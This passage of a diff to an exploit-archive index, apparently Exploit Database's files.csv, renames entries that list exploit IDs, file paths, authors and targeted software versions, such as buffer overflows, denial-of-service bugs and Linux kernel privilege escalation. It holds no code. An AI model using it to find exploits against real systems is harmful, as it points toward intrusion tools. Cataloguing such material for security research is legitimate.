Service",2003-06-23,posidron,windows,dos,0 +22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 - GET Remote Denial of Service",2003-06-23,posidron,windows,dos,0 22831,platforms/freebsd/dos/22831.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (1)",2003-06-24,dodo,freebsd,dos,0 22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos,0 22844,platforms/windows/dos/22844.html,"Opera 7 - Denial of Service",2003-06-30,Operash,windows,dos,0 @@ -2917,7 +2917,7 @@ id,file,description,date,author,platform,type,port 22875,platforms/windows/dos/22875.txt,"MyServer 0.4.2 - Malformed URI Denial of Service",2003-07-07,"Morning Wood",windows,dos,0 22876,platforms/hardware/dos/22876.txt,"Canon GP300 - Remote GET Denial of Service",2003-07-07,"DOUHINE Davy",hardware,dos,0 22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 - JP2KLib&CoolType Crash (PoC)",2012-11-21,coolkaveh,windows,dos,0 -22897,platforms/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - 'GET' Request Buffer Overflow",2003-07-07,posidron,linux,dos,0 +22897,platforms/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - GET Buffer Overflow",2003-07-07,posidron,linux,dos,0 22899,platforms/windows/dos/22899.txt,"StarSiege Tribes Server - Denial of Service (1)",2003-06-10,st0ic,windows,dos,0 22900,platforms/windows/dos/22900.php,"StarSiege Tribes Server - Denial of Service (2)",2003-07-14,st0ic,windows,dos,0 22902,platforms/linux/dos/22902.sh,"lighttpd 1.4.31 - Denial of Service (PoC)",2012-11-22,t4c,linux,dos,0 @@ -3043,7 +3043,7 @@ id,file,description,date,author,platform,type,port 23469,platforms/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash (PoC)",2012-12-18,coolkaveh,windows,dos,0 23480,platforms/windows/dos/23480.txt,"Surfboard httpd 1.1.9 - Remote Buffer Overflow",2003-12-26,"decka trash",windows,dos,0 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos,0 -23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0 +23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004)",2003-12-30,"Arman Nayyeri",windows,dos,0 23505,platforms/osx/dos/23505.c,"Apple Mac OSX 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 @@ -3069,7 +3069,7 @@ id,file,description,date,author,platform,type,port 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 -23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 +23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - GET Remote Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0 23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos,0 23690,platforms/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos,0 @@ -3082,7 +3082,7 @@ id,file,description,date,author,platform,type,port 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0 23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0 -23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 +23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0 23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0 23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0 @@ -3319,11 +3319,11 @@ id,file,description,date,author,platform,type,port 25076,platforms/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos,0 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0 -25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 +25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 -25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - Long GET Request Denial of Service",2005-02-19,MurDoK,hardware,dos,0 +25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,hardware,dos,0 25128,platforms/windows/dos/25128.txt,"Easy Icon Maker 5.01 - Crash (PoC)",2013-05-01,Asesino04,windows,dos,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0 25140,platforms/windows/dos/25140.txt,"WPS Office - 'Wpsio.dll' Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos,0 @@ -3548,7 +3548,7 @@ id,file,description,date,author,platform,type,port 27764,platforms/linux/dos/27764.txt,"LibTiff 3.x - TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",linux,dos,0 27765,platforms/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos,0 27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0 -27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0 +27775,platforms/hardware/dos/27775.py,"NETGEAR ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0 27778,platforms/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,linux,dos,139 27790,platforms/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0 27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0 @@ -3923,7 +3923,7 @@ id,file,description,date,author,platform,type,port 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 -31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 +31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - POST Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 @@ -4099,7 +4099,7 @@ id,file,description,date,author,platform,type,port 32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0 32573,platforms/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos,0 32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 -32583,platforms/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 +32583,platforms/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 32596,platforms/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial of Service",2008-11-20,"Christian Hoffmann",multiple,dos,0 32657,platforms/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,windows,dos,0 @@ -4270,7 +4270,7 @@ id,file,description,date,author,platform,type,port 33755,platforms/php/dos/33755.php,"PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0 -33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0 +33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0 33800,platforms/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",multiple,dos,0 33801,platforms/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos,0 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow",2014-06-18,LiquidWorm,windows,dos,0 @@ -4286,7 +4286,7 @@ id,file,description,date,author,platform,type,port 40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 -33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 +33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",windows,dos,0 33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos,0 @@ -4337,7 +4337,7 @@ id,file,description,date,author,platform,type,port 34364,platforms/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos,0 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0 -34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 +34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 @@ -4483,7 +4483,7 @@ id,file,description,date,author,platform,type,port 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)",2015-02-22,"Praveen Darshanam",windows,dos,0 36158,platforms/php/dos/36158.txt,"PHP DateTime - Use-After-Free",2015-02-23,"Taoguang Chen",php,dos,0 36190,platforms/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption (PoC)",2015-02-26,"Andras Kabai",linux,dos,0 -36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial of Service",2011-10-01,"Usman Saeed",multiple,dos,0 +36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service",2011-10-01,"Usman Saeed",multiple,dos,0 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial of Service",2011-04-11,"Luigi Auriemma",windows,dos,0 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 - Buffer Overflow / Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos,0 36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web Component - Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 @@ -4500,7 +4500,7 @@ id,file,description,date,author,platform,type,port 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial of Service",2011-11-25,"Houssam Sahli",windows,dos,0 -36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 +36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0 36388,platforms/linux/dos/36388.py,"Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,dos,0 @@ -4578,7 +4578,7 @@ id,file,description,date,author,platform,type,port 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 - '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,windows,dos,0 37462,platforms/windows/dos/37462.pl,"VideoLAN VLC Media Player 2.0.1 - '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer - '.avi' File Divide-by-Zero Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 -37471,platforms/windows/dos/37471.pl,"Zoom Player - '.avi' File Divide-by-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos,0 +37471,platforms/windows/dos/37471.pl,"Zoom Player - '.avi' Divide-by-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos,0 37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal - Escape Sequence Parsing Remote Denial of Service",2012-07-03,"Kevin Fenzi",linux,dos,0 37478,platforms/multiple/dos/37478.txt,"plow - '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",multiple,dos,0 37480,platforms/windows/dos/37480.pl,"Solar FTP Server - Denial of Service",2012-07-05,coolkaveh,windows,dos,0 @@ -4641,8 +4641,8 @@ id,file,description,date,author,platform,type,port 37853,platforms/windows/dos/37853.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (1)",2015-08-19,"Google Security Research",windows,dos,0 37854,platforms/windows/dos/37854.txt,"Adobe Flash AS2 - MovieClip.scrollRect Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0 37855,platforms/multiple/dos/37855.txt,"Adobe Flash - Setting Value Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 -37856,platforms/windows/dos/37856.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (1)",2015-08-19,"Google Security Research",windows,dos,0 -37857,platforms/windows/dos/37857.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (2)",2015-08-19,"Google Security Research",windows,dos,0 +37856,platforms/windows/dos/37856.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (1)",2015-08-19,"Google Security Research",windows,dos,0 +37857,platforms/windows/dos/37857.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (2)",2015-08-19,"Google Security Research",windows,dos,0 37858,platforms/windows/dos/37858.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos,0 37859,platforms/multiple/dos/37859.txt,"Adobe Flash - XML.childNodes Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37860,platforms/windows/dos/37860.txt,"Adobe Flash AS2 - Color.setRGB Use-After-Free",2015-08-19,bilou,windows,dos,0 @@ -4841,7 +4841,7 @@ id,file,description,date,author,platform,type,port 38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",windows,dos,0 38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash (PoC)",2015-11-23,"Antonio Z.",windows,dos,0 38793,platforms/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 -38794,platforms/windows/dos/38794.txt,"Microsoft Windows - Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 +38794,platforms/windows/dos/38794.txt,"Microsoft Windows - Cursor Object Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38795,platforms/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38796,platforms/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 @@ -4996,9 +4996,9 @@ id,file,description,date,author,platform,type,port 39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0 -39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 -39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 -39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 +39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 +39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 +39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0 @@ -5132,7 +5132,7 @@ id,file,description,date,author,platform,type,port 39825,platforms/multiple/dos/39825.txt,"Adobe Flash - Out-of-Bounds Read when Placing Object",2016-05-17,"Google Security Research",multiple,dos,0 39826,platforms/multiple/dos/39826.txt,"Adobe Flash - Overflow in Processing Raw 565 Textures",2016-05-17,"Google Security Research",multiple,dos,0 39827,platforms/multiple/dos/39827.txt,"Adobe Flash - Heap Overflow in ATF Processing (Image Reading)",2016-05-17,"Google Security Research",multiple,dos,0 -39828,platforms/multiple/dos/39828.txt,"Adobe Flash - '.MP4' File Stack Corruption",2016-05-17,"Google Security Research",multiple,dos,0 +39828,platforms/multiple/dos/39828.txt,"Adobe Flash - '.MP4' Stack Corruption",2016-05-17,"Google Security Research",multiple,dos,0 39829,platforms/multiple/dos/39829.txt,"Adobe Flash - Type Confusion in FileReference Constructor",2016-05-17,"Google Security Research",multiple,dos,0 39830,platforms/multiple/dos/39830.txt,"Adobe Flash - addProperty Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 39831,platforms/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 @@ -6141,7 +6141,7 @@ id,file,description,date,author,platform,type,port 3776,platforms/windows/local/3776.c,"ACDSee 9.0 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 3777,platforms/windows/local/3777.c,"XnView 1.90.3 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 3779,platforms/windows/local/3779.c,"Corel Paint Shop Pro Photo 11.20 - '.clp' Buffer Overflow",2007-04-23,Marsu,windows,local,0 -3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 / CS3 - Unspecified '.bmp' File Buffer Overflow",2007-04-24,Marsu,windows,local,0 +3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 / CS3 - '.bmp' Buffer Overflow",2007-04-24,Marsu,windows,local,0 3797,platforms/windows/local/3797.c,"ABC-View Manager 1.42 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0 3798,platforms/windows/local/3798.c,"FreshView 7.15 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0 3801,platforms/windows/local/3801.c,"GIMP 2.2.14 - '.ras' SUNRAS Plugin Buffer Overflow",2007-04-26,Marsu,windows,local,0 @@ -6407,7 +6407,7 @@ id,file,description,date,author,platform,type,port 8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 - '.rdl' Local Buffer Overflow",2009-04-27,G4N0K,windows,local,0 8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (1)",2009-04-27,His0k4,windows,local,0 8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (2)",2009-04-27,SimO-s0fT,windows,local,0 -8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - '.m3u' File Buffer Overflow (SEH)",2009-04-27,Nine:Situations:Group,windows,local,0 +8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - '.m3u' Buffer Overflow (SEH)",2009-04-27,Nine:Situations:Group,windows,local,0 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Privilege Escalation (2)",2009-04-30,"Jon Oberheide",linux,local,0 8580,platforms/windows/local/8580.py,"Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow",2009-04-30,His0k4,windows,local,0 8582,platforms/windows/local/8582.py,"Mercury Audio Player 1.21 - '.pls' Overwrite (SEH)",2009-04-30,His0k4,windows,local,0 @@ -8091,7 +8091,7 @@ id,file,description,date,author,platform,type,port 22781,platforms/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin()' 'Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",linux,local,0 22806,platforms/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,linux,local,0 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0 -22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0 +22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure",2003-06-20,IhaQueR,linux,local,0 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,linux,local,0 40409,platforms/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun",2003-06-24,posidron,windows,local,0 @@ -8491,7 +8491,7 @@ id,file,description,date,author,platform,type,port 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0 31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0 31347,platforms/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Privilege Escalation 